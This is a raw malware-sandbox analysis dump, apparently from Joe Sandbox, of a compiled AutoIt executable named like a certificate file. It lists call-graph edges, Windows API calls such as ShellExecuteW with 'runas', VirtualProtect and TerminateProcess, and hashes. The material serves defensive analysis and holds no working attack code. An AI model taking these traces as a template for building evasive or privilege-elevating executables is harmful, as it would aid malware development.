48 API calls 95300->95319 95320 8dbecb 335 API calls 
95300->95320 95326 8cdcae 50 API calls Mailbox 95300->95326 95327 91ccdc 48 API calls 95300->95327 95328 90a1eb 50 API calls 95300->95328 95301->95243 95302->95301 95338 90cc5c 86 API calls 4 library calls 95302->95338 95303 93715f 95313 9371a1 95303->95313 95330 91ccdc 48 API calls 95303->95330 95304->95300 95309 9371ce 95310 8dc050 48 API calls 95309->95310 95312 9371d6 95310->95312 95311 9371ab 95311->95268 95311->95309 95312->95302 95314 937313 95312->95314 95331 8dc15c 48 API calls 95313->95331 95337 90cc5c 86 API calls 4 library calls 95314->95337 95316->95300 95317->95300 95318->95300 95319->95300 95320->95300 95321->95301 95322->95254 95323->95248 95324->95300 95325->95301 95326->95300 95327->95300 95328->95300 95329->95303 95330->95303 95331->95311 95332->95272 95333->95301 95334->95284 95335->95301 95336->95301 95337->95301 95338->95301 95339->95301 95340->95301 95341->95301 95342->95301 95343->95261 95344 9319dd 95349 8c4a30 95344->95349 95346 9319f1 95369 8e0f0a 52 API calls __cinit 95346->95369 95348 9319fb 95350 8c4a40 __ftell_nolock 95349->95350 95351 8cd7f7 48 API calls 95350->95351 95352 8c4af6 95351->95352 95353 8c5374 50 API calls 95352->95353 95354 8c4aff 95353->95354 95370 8c363c 95354->95370 95357 8c518c 48 API calls 95358 8c4b18 95357->95358 95359 8c64cf 48 API calls 95358->95359 95360 8c4b29 95359->95360 95361 8cd7f7 48 API calls 95360->95361 95362 8c4b32 95361->95362 95376 8c49fb 95362->95376 95364 8c4b43 Mailbox 95364->95346 95365 8c4b3d _wcscat Mailbox __wsetenvp 95365->95364 95366 8c61a6 48 API calls 95365->95366 95367 8cce19 48 API calls 95365->95367 95368 8c64cf 48 API calls 95365->95368 95366->95365 95367->95365 95368->95365 95369->95348 95371 8c3649 __ftell_nolock 95370->95371 95390 8c366c GetFullPathNameW 95371->95390 95373 8c365a 95374 8c6a63 48 API calls 95373->95374 95375 8c3669 95374->95375 95375->95357 95392 8cbcce 95376->95392 95379 8c4a2b 95379->95365 95380 9341cc RegQueryValueExW 95381 934246 RegCloseKey 95380->95381 95382 
9341e5 95380->95382 95383 8df4ea 48 API calls 95382->95383 95384 9341fe 95383->95384 95385 8c47b7 48 API calls 95384->95385 95386 934208 RegQueryValueExW 95385->95386 95387 934224 95386->95387 95388 93423b 95386->95388 95389 8c6a63 48 API calls 95387->95389 95388->95381 95389->95388 95391 8c368a 95390->95391 95391->95373 95393 8cbce8 95392->95393 95397 8c4a0a RegOpenKeyExW 95392->95397 95394 8df4ea 48 API calls 95393->95394 95395 8cbcf2 95394->95395 95396 8dee75 48 API calls 95395->95396 95396->95397 95397->95379 95397->95380 95398 8c3742 95399 8c374b 95398->95399 95400 8c37c8 95399->95400 95401 8c3769 95399->95401 95438 8c37c6 95399->95438 95403 8c37ce 95400->95403 95404 931e00 95400->95404 95405 8c382c PostQuitMessage 95401->95405 95406 8c3776 95401->95406 95402 8c37ab DefWindowProcW 95440 8c37b9 95402->95440 95407 8c37f6 SetTimer RegisterWindowMessageW 95403->95407 95408 8c37d3 95403->95408 95447 8c2ff6 16 API calls 95404->95447 95405->95440 95410 931e88 95406->95410 95411 8c3781 95406->95411 95415 8c381f CreatePopupMenu 95407->95415 95407->95440 95412 931da3 95408->95412 95413 8c37da KillTimer 95408->95413 95452 904ddd 60 API calls _memset 95410->95452 95416 8c3789 95411->95416 95417 8c3836 95411->95417 95420 931da8 95412->95420 95421 931ddc MoveWindow 95412->95421 95443 8c3847 Shell_NotifyIconW _memset 95413->95443 95414 931e27 95448 8de312 335 API calls Mailbox 95414->95448 95415->95440 95424 8c3794 95416->95424 95425 931e6d 95416->95425 95445 8deb83 53 API calls _memset 95417->95445 95427 931dcb SetFocus 95420->95427 95428 931dac 95420->95428 95421->95440 95430 931e58 95424->95430 95435 8c379f 95424->95435 95425->95402 95451 8fa5f3 48 API calls 95425->95451 95426 931e9a 95426->95402 95426->95440 95427->95440 95431 931db5 95428->95431 95428->95435 95429 8c37ed 95444 8c390f DeleteObject DestroyWindow Mailbox 95429->95444 95450 9055bd 70 API calls _memset 95430->95450 95446 8c2ff6 16 API calls 95431->95446 95435->95402 95449 8c3847 Shell_NotifyIconW _memset 
95435->95449 95437 8c3845 95437->95440 95438->95402 95441 931e4c 95442 8c4ffc 67 API calls 95441->95442 95442->95438 95443->95429 95444->95440 95445->95437 95446->95440 95447->95414 95448->95435 95449->95441 95450->95437 95451->95438 95452->95426 95453 939bec 95491 8d0ae0 Mailbox ___crtGetEnvironmentStringsW 95453->95491 95455 8df4ea 48 API calls 95455->95491 95458 8df4ea 48 API calls 95482 8cfec8 95458->95482 95460 8d146e 95468 8c6eed 48 API calls 95460->95468 95462 8d0509 95548 90cc5c 86 API calls 4 library calls 95462->95548 95463 8d1473 95547 90cc5c 86 API calls 4 library calls 95463->95547 95465 8c6eed 48 API calls 95465->95482 95467 93a246 95470 8c6eed 48 API calls 95467->95470 95483 8cffe1 Mailbox 95468->95483 95469 93a922 95470->95483 95473 93a873 95474 8f97ed InterlockedDecrement 95474->95482 95475 93a30e 95475->95483 95543 8f97ed InterlockedDecrement 95475->95543 95476 8cd7f7 48 API calls 95476->95482 95477 8cce19 48 API calls 95477->95491 95479 8e0f0a 52 API calls __cinit 95479->95482 95480 93a973 95549 90cc5c 86 API calls 4 library calls 95480->95549 95482->95458 95482->95460 95482->95462 95482->95463 95482->95465 95482->95467 95482->95474 95482->95475 95482->95476 95482->95479 95482->95480 95482->95483 95485 8d15b5 95482->95485 95540 8d1820 335 API calls 2 library calls 95482->95540 95541 8d1d10 59 API calls Mailbox 95482->95541 95484 93a982 95546 90cc5c 86 API calls 4 library calls 95485->95546 95486 91e822 335 API calls 95486->95491 95487 8cfe30 335 API calls 95487->95491 95488 93a706 95544 90cc5c 86 API calls 4 library calls 95488->95544 95490 8d1526 Mailbox 95545 90cc5c 86 API calls 4 library calls 95490->95545 95491->95455 95491->95477 95491->95482 95491->95483 95491->95486 95491->95487 95491->95488 95491->95490 95492 8f97ed InterlockedDecrement 95491->95492 95493 916ff0 335 API calls 95491->95493 95496 920d09 95491->95496 95499 920d1d 95491->95499 95502 91f0ac 95491->95502 95534 90a6ef 95491->95534 95542 91ef61 82 API calls 2 library calls 
95491->95542 95492->95491 95493->95491 95550 91f8ae 95496->95550 95498 920d19 95498->95491 95500 91f8ae 129 API calls 95499->95500 95501 920d2d 95500->95501 95501->95491 95503 8cd7f7 48 API calls 95502->95503 95504 91f0c0 95503->95504 95505 8cd7f7 48 API calls 95504->95505 95506 91f0c8 95505->95506 95507 8cd7f7 48 API calls 95506->95507 95508 91f0d0 95507->95508 95509 8c936c 81 API calls 95508->95509 95533 91f0de 95509->95533 95510 8c6a63 48 API calls 95510->95533 95511 91f2cc 95512 91f2f9 Mailbox 95511->95512 95637 8c6b68 48 API calls 95511->95637 95512->95491 95513 91f2b3 95518 8c518c 48 API calls 95513->95518 95515 8cc799 48 API calls 95515->95533 95516 91f2ce 95520 8c518c 48 API calls 95516->95520 95517 8c6eed 48 API calls 95517->95533 95519 91f2c0 95518->95519 95521 8c510d 48 API calls 95519->95521 95522 91f2dd 95520->95522 95521->95511 95524 8c510d 48 API calls 95522->95524 95523 8cbdfa 48 API calls 95526 91f175 CharUpperBuffW 95523->95526 95524->95511 95525 8cbdfa 48 API calls 95527 91f23a CharUpperBuffW 95525->95527 95528 8cd645 53 API calls 95526->95528 95636 8dd922 55 API calls 2 library calls 95527->95636 95528->95533 95530 8c518c 48 API calls 95530->95533 95531 8c936c 81 API calls 95531->95533 95532 8c510d 48 API calls 95532->95533 95533->95510 95533->95511 95533->95512 95533->95513 95533->95515 95533->95516 95533->95517 95533->95523 95533->95525 95533->95530 95533->95531 95533->95532 95535 90a6fb 95534->95535 95536 8df4ea 48 API calls 95535->95536 95537 90a709 95536->95537 95538 90a717 95537->95538 95539 8cd7f7 48 API calls 95537->95539 95538->95491 95539->95538 95540->95482 95541->95482 95542->95491 95543->95483 95544->95490 95545->95483 95546->95483 95547->95473 95548->95469 95549->95484 95551 8c936c 81 API calls 95550->95551 95552 91f8ea 95551->95552 95575 91f92c Mailbox 95552->95575 95586 920567 95552->95586 95554 91fb8b 95555 91fcfa 95554->95555 95559 91fb95 95554->95559 95622 920688 89 API calls Mailbox 95555->95622 95558 91fd07 95558->95559 
95561 91fd13 95558->95561 95599 91f70a 95559->95599 95560 8c936c 81 API calls 95579 91f984 Mailbox 95560->95579 95561->95575 95566 91fbc9 95613 8ded18 95566->95613 95569 91fbe3 95619 90cc5c 86 API calls 4 library calls 95569->95619 95570 91fbfd 95571 8dc050 48 API calls 95570->95571 95573 91fc14 95571->95573 95576 8d1b90 48 API calls 95573->95576 95584 91fc3e 95573->95584 95574 91fbee GetCurrentProcess TerminateProcess 95574->95570 95575->95498 95578 91fc2d 95576->95578 95577 91fd65 95577->95575 95582 91fd7e FreeLibrary 95577->95582 95620 92040f 105 API calls _free 95578->95620 95579->95554 95579->95560 95579->95575 95579->95579 95617 9229e8 48 API calls ___crtGetEnvironmentStringsW 95579->95617 95618 91fda5 60 API calls 2 library calls 95579->95618 95581 8d1b90 48 API calls 95581->95584 95582->95575 95584->95577 95584->95581 95621 8cdcae 50 API calls Mailbox 95584->95621 95623 92040f 105 API calls _free 95584->95623 95587 8cbdfa 48 API calls 95586->95587 95588 920582 CharLowerBuffW 95587->95588 95624 901f11 95588->95624 95592 8cd7f7 48 API calls 95593 9205bb 95592->95593 95631 8c69e9 48 API calls ___crtGetEnvironmentStringsW 95593->95631 95595 9205d2 95596 8cb18b 48 API calls 95595->95596 95597 9205de Mailbox 95596->95597 95598 92061a Mailbox 95597->95598 95632 91fda5 60 API calls 2 library calls 95597->95632 95598->95579 95600 91f725 95599->95600 95604 91f77a 95599->95604 95601 8df4ea 48 API calls 95600->95601 95603 91f747 95601->95603 95602 8df4ea 48 API calls 95602->95603 95603->95602 95603->95604 95605 920828 95604->95605 95606 920a53 Mailbox 95605->95606 95612 92084b _strcat _wcscpy __wsetenvp 95605->95612 95606->95566 95607 8ccf93 58 API calls 95607->95612 95608 8cd286 48 API calls 95608->95612 95609 8c936c 81 API calls 95609->95612 95610 8e395c 47 API calls _W_store_winword 95610->95612 95612->95606 95612->95607 95612->95608 95612->95609 95612->95610 95635 908035 50 API calls __wsetenvp 95612->95635 95614 8ded2d 95613->95614 95615 8dedc5 VirtualProtect 
95614->95615 95616 8ded93 95614->95616 95615->95616 95616->95569 95616->95570 95617->95579 95618->95579 95619->95574 95620->95584 95621->95584 95622->95558 95623->95584 95625 901f3b __wsetenvp 95624->95625 95626 901f79 95625->95626 95627 901f6f 95625->95627 95630 901ffa 95625->95630 95626->95592 95626->95597 95627->95626 95633 8dd37a 60 API calls 95627->95633 95630->95626 95634 8dd37a 60 API calls 95630->95634 95631->95595 95632->95598 95633->95627 95634->95630 95635->95612 95636->95533 95637->95512

Control-flow Graph

[Control-flow graph rendering (basic blocks 8eb043 to 8eb86c, coloured executed / not executed); the spilled edge list is omitted here. Windows APIs called from this function: GetConsoleMode, GetConsoleCP, WideCharToMultiByte, WriteFile, GetLastError. Internal calls: 8ef8a0, 8ef82f, 8f3bf2, 8e7a0d, 8e7bda, 8e7c0e, 8e7bed, 8e6e10, 8ea70c, 8e1688, 8f40f7, 8f5884.]
Memory Dump Source
• Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
• Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 978f36e9f7692232c95d2ae74eabf6bc1990aa34c718bc2635601a528e3270af
• Instruction ID: ab47a111a730d5958d9a3ac3fcb6092f4b8d5dd99abbbe0fbc9821f4fdaaca96
• Opcode Fuzzy Hash: 978f36e9f7692232c95d2ae74eabf6bc1990aa34c718bc2635601a528e3270af
• Instruction Fuzzy Hash: 1A325D75B122688BDB248F19DC816EAB7B5FF47314F1841E9E40AE7A91D7309E80CF52

Control-flow Graph

APIs
• GetCurrentDirectoryW.KERNEL32(00007FFF,?,00000000,00000001,?,?,008C3AA3,?), ref: 008C3D45
• IsDebuggerPresent.KERNEL32(?,?,?,?,008C3AA3,?), ref: 008C3D57
• GetFullPathNameW.KERNEL32(00007FFF,?,?,00981148,00981130,?,?,?,?,008C3AA3,?), ref: 008C3DC8
  • Part of subcall function 008C6430: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,008C3DEE,00981148,?,?,?,?,?,008C3AA3,?), ref: 008C6471
• SetCurrentDirectoryW.KERNEL32(?,?,?,008C3AA3,?), ref: 008C3E48
• MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,009728F4,00000010), ref: 00931CCE
• SetCurrentDirectoryW.KERNEL32(?,00981148,?,?,?,?,?,008C3AA3,?), ref: 00931D06
• GetForegroundWindow.USER32(runas,?,?,?,00000001,?,0095DAB4,00981148,?,?,?,?,?,008C3AA3,?), ref: 00931D89
• ShellExecuteW.SHELL32(00000000,?,?,?,?,008C3AA3), ref: 00931D90
  • Part of subcall function 008C3E6E: GetSysColorBrush.USER32(0000000F), ref: 008C3E79
  • Part of subcall function 008C3E6E: LoadCursorW.USER32(00000000,00007F00), ref: 008C3E88
  • Part of subcall function 008C3E6E: LoadIconW.USER32(00000063), ref: 008C3E9E
  • Part of subcall function 008C3E6E: LoadIconW.USER32(000000A4), ref: 008C3EB0
  • Part of subcall function 008C3E6E: LoadIconW.USER32(000000A2), ref: 008C3EC2
  • Part of subcall function 008C3E6E: RegisterClassExW.USER32(?), ref: 008C3F30
  • Part of subcall function 008C36B8: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 008C36E6
                                                                                • Part of subcall function 008C36B8: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 008C3707
                                                                                • Part of subcall function 008C36B8: ShowWindow.USER32(00000000,?,?,?,?,008C3AA3,?), ref: 008C371B
                                                                                • Part of subcall function 008C36B8: ShowWindow.USER32(00000000,?,?,?,?,008C3AA3,?), ref: 008C3724
                                                                                • Part of subcall function 008C4FFC: _memset.LIBCMT ref: 008C5022
                                                                                • Part of subcall function 008C4FFC: Shell_NotifyIconW.SHELL32(00000000,?), ref: 008C50CB
                                                                              Strings
                                                                              • runas, xrefs: 00931D84
                                                                              • This is a third-party compiled AutoIt script., xrefs: 00931CC8
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: Window$IconLoad$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundMessageNotifyPresentRegisterShellShell__memset
                                                                              • String ID: This is a third-party compiled AutoIt script.$runas
                                                                              • API String ID: 438480954-3287110873
                                                                              • Opcode ID: 8f068a7e1105acfa7a3df73a9a6f0dead0026207224aac8a8abfdc43ed23bfc0
                                                                              • Instruction ID: 4897cb91e1ed067d7029a1639c77c22d0b62bc28d9333f8cf8793a9cf4fac68d
                                                                              • Opcode Fuzzy Hash: 8f068a7e1105acfa7a3df73a9a6f0dead0026207224aac8a8abfdc43ed23bfc0
                                                                              • Instruction Fuzzy Hash: DB510735A1C248AACF11ABF4DC49FED7B79FB56704F00802DF501E22A2DA7496469B22

                                                                              Control-flow Graph

                                                                              APIs
                                                                              • GetVersionExW.KERNEL32(?), ref: 008DDDEC
                                                                              • GetCurrentProcess.KERNEL32(00000000,0095DC38,?,?), ref: 008DDEAC
                                                                              • GetNativeSystemInfo.KERNELBASE(?,0095DC38,?,?), ref: 008DDF01
                                                                              • FreeLibrary.KERNEL32(00000000,?,?), ref: 008DDF0C
                                                                              • FreeLibrary.KERNEL32(00000000,?,?), ref: 008DDF1F
                                                                              • GetSystemInfo.KERNEL32(?,0095DC38,?,?), ref: 008DDF29
                                                                              • GetSystemInfo.KERNEL32(?,0095DC38,?,?), ref: 008DDF35
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: InfoSystem$FreeLibrary$CurrentNativeProcessVersion
                                                                              • String ID:
                                                                              • API String ID: 3851250370-0
                                                                              • Opcode ID: 7112ad6e11a0914cdf631f2b528ec964110ec87a44e267f299b0636594fdc38e
                                                                              • Instruction ID: 2b530d6d4b6b8889aad72feff0fa7b2e11e276931a75e2b4c5a48c1abefeb215
                                                                              • Opcode Fuzzy Hash: 7112ad6e11a0914cdf631f2b528ec964110ec87a44e267f299b0636594fdc38e
                                                                              • Instruction Fuzzy Hash: DF61B1B180A384CBCF15CFA898C15E97FB4BF2A304F194AD9D8459F307C624C909CB66

                                                                              Control-flow Graph

                                                                              APIs
                                                                              • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?,?,?,?,?,008C449E,?,?,00000000,00000001), ref: 008C407B
                                                                              • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,008C449E,?,?,00000000,00000001), ref: 008C4092
                                                                              • LoadResource.KERNEL32(?,00000000,?,?,008C449E,?,?,00000000,00000001,?,?,?,?,?,?,008C41FB), ref: 00934F1A
                                                                              • SizeofResource.KERNEL32(?,00000000,?,?,008C449E,?,?,00000000,00000001,?,?,?,?,?,?,008C41FB), ref: 00934F2F
                                                                              • LockResource.KERNEL32(008C449E,?,?,008C449E,?,?,00000000,00000001,?,?,?,?,?,?,008C41FB,00000000), ref: 00934F42
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                                              • String ID: SCRIPT
                                                                              • API String ID: 3051347437-3967369404
                                                                              • Opcode ID: 720f4066009eb61f947bd2d71fc42f75c57a47dc0ca867f1d92a62645df6d7f1
                                                                              • Instruction ID: 2f8c994475a7911e5f45ed093877f04676c22071eec8a4c45e4ecaec98dadd00
                                                                              • Opcode Fuzzy Hash: 720f4066009eb61f947bd2d71fc42f75c57a47dc0ca867f1d92a62645df6d7f1
                                                                              • Instruction Fuzzy Hash: 55113C79244B01BFE7218B65EC58F277BB9EBC6B51F14816CF612D62A0DBB1DC409A20
                                                                              APIs
                                                                              • GetFileAttributesW.KERNELBASE(?,00932F49), ref: 00906CB9
                                                                              • FindFirstFileW.KERNELBASE(?,?), ref: 00906CCA
                                                                              • FindClose.KERNEL32(00000000), ref: 00906CDA
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: FileFind$AttributesCloseFirst
                                                                              • String ID:
                                                                              • API String ID: 48322524-0
                                                                              • Opcode ID: ef0e11e9d37231566a6094a29f45fd376752a46a11b36cdda678b08ff14022e8
                                                                              • Instruction ID: c3a4b9c878c0384332912052eff898e856dbdf7044a79f895596eda7cfc3c687
                                                                              • Opcode Fuzzy Hash: ef0e11e9d37231566a6094a29f45fd376752a46a11b36cdda678b08ff14022e8
                                                                              • Instruction Fuzzy Hash: 72E0D8398294209BD2186738EC0D8E937ACDA0A339F100709FAF1C11D0E770E91056D5
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: Exception@8Throwstd::exception::exception
                                                                              • String ID: @
                                                                              • API String ID: 3728558374-2766056989
                                                                              • Opcode ID: 974dd541f89b4e1250afd5cec7d63ae7e8802ccc6df215099092afdf0e80e0e0
                                                                              • Instruction ID: 3f8823dbb04989d7acb948cc44f238c2f3cb88f70170a4d2bb67fe963523d251
                                                                              • Opcode Fuzzy Hash: 974dd541f89b4e1250afd5cec7d63ae7e8802ccc6df215099092afdf0e80e0e0
                                                                              • Instruction Fuzzy Hash: E172BF75E04209AFCF24DF98C481AAEB7B5FF48304F14815AE909EB391D771AE45CB92
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: BuffCharUpper
                                                                              • String ID:
                                                                              • API String ID: 3964851224-0
                                                                              • Opcode ID: 312a643a5dd4cda22076abf345cd297fed5893f280061a5404a4046326a9ef11
                                                                              • Instruction ID: e162603a8a5b9008b5cb20966be90525a7606173632467ef1116eb557d6bde24
                                                                              • Opcode Fuzzy Hash: 312a643a5dd4cda22076abf345cd297fed5893f280061a5404a4046326a9ef11
                                                                              • Instruction Fuzzy Hash: 29925A706083419FD724DF18C484B6AB7E5FF88308F148A6EE99A8B362D771ED45CB52
                                                                              APIs
                                                                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 008CE959
                                                                              • timeGetTime.WINMM ref: 008CEBFA
                                                                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 008CED2E
                                                                              • TranslateMessage.USER32(?), ref: 008CED3F
                                                                              • DispatchMessageW.USER32(?), ref: 008CED4A
                                                                              • LockWindowUpdate.USER32(00000000), ref: 008CED79
                                                                              • DestroyWindow.USER32 ref: 008CED85
                                                                              • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 008CED9F
                                                                              • Sleep.KERNEL32(0000000A), ref: 00935270
                                                                              • TranslateMessage.USER32(?), ref: 009359F7
                                                                              • DispatchMessageW.USER32(?), ref: 00935A05
                                                                              • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00935A19
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: Message$DispatchPeekTranslateWindow$DestroyLockSleepTimeUpdatetime
                                                                              • String ID: @GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID
                                                                              • API String ID: 2641332412-570651680
                                                                              • Opcode ID: 89196d8ddd37eaef2f3dbaecf7abe32ea4a625adf406389e928bda95a96c18fb
                                                                              • Instruction ID: 8fb360937fda372b2b6becf3d1bf6cbc95772c5c635d0221b83978b20e5a52f1
                                                                              • Opcode Fuzzy Hash: 89196d8ddd37eaef2f3dbaecf7abe32ea4a625adf406389e928bda95a96c18fb
                                                                              • Instruction Fuzzy Hash: 59627D705083449FDB24DF28C885FAA77E8FF49304F18496DE98ADB292DB75D848CB52
                                                                              APIs
                                                                              • ___createFile.LIBCMT ref: 008F5EC3
                                                                              • ___createFile.LIBCMT ref: 008F5F04
                                                                              • GetLastError.KERNEL32(?,?,?,?,?,00000000,00000109), ref: 008F5F2D
                                                                              • __dosmaperr.LIBCMT ref: 008F5F34
                                                                              • GetFileType.KERNELBASE(00000000,?,?,?,?,?,00000000,00000109), ref: 008F5F47
                                                                              • GetLastError.KERNEL32(?,?,?,?,?,00000000,00000109), ref: 008F5F6A
                                                                              • __dosmaperr.LIBCMT ref: 008F5F73
                                                                              • CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 008F5F7C
                                                                              • __set_osfhnd.LIBCMT ref: 008F5FAC
• __lseeki64_nolock.LIBCMT ref: 008F6016
• __close_nolock.LIBCMT ref: 008F603C
• __chsize_nolock.LIBCMT ref: 008F606C
• __lseeki64_nolock.LIBCMT ref: 008F607E
• __lseeki64_nolock.LIBCMT ref: 008F6176
• __lseeki64_nolock.LIBCMT ref: 008F618B
• __close_nolock.LIBCMT ref: 008F61EB
  • Part of subcall function 008EEA9C: CloseHandle.KERNELBASE(00000000,0096EEF4,00000000,?,008F6041,0096EEF4,?,?,?,?,?,?,?,?,00000000,00000109), ref: 008EEAEC
  • Part of subcall function 008EEA9C: GetLastError.KERNEL32(?,008F6041,0096EEF4,?,?,?,?,?,?,?,?,00000000,00000109), ref: 008EEAF6
  • Part of subcall function 008EEA9C: __free_osfhnd.LIBCMT ref: 008EEB03
  • Part of subcall function 008EEA9C: __dosmaperr.LIBCMT ref: 008EEB25
  • Part of subcall function 008E7C0E: __getptd_noexit.LIBCMT ref: 008E7C0E
• __lseeki64_nolock.LIBCMT ref: 008F620D
• CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 008F6342
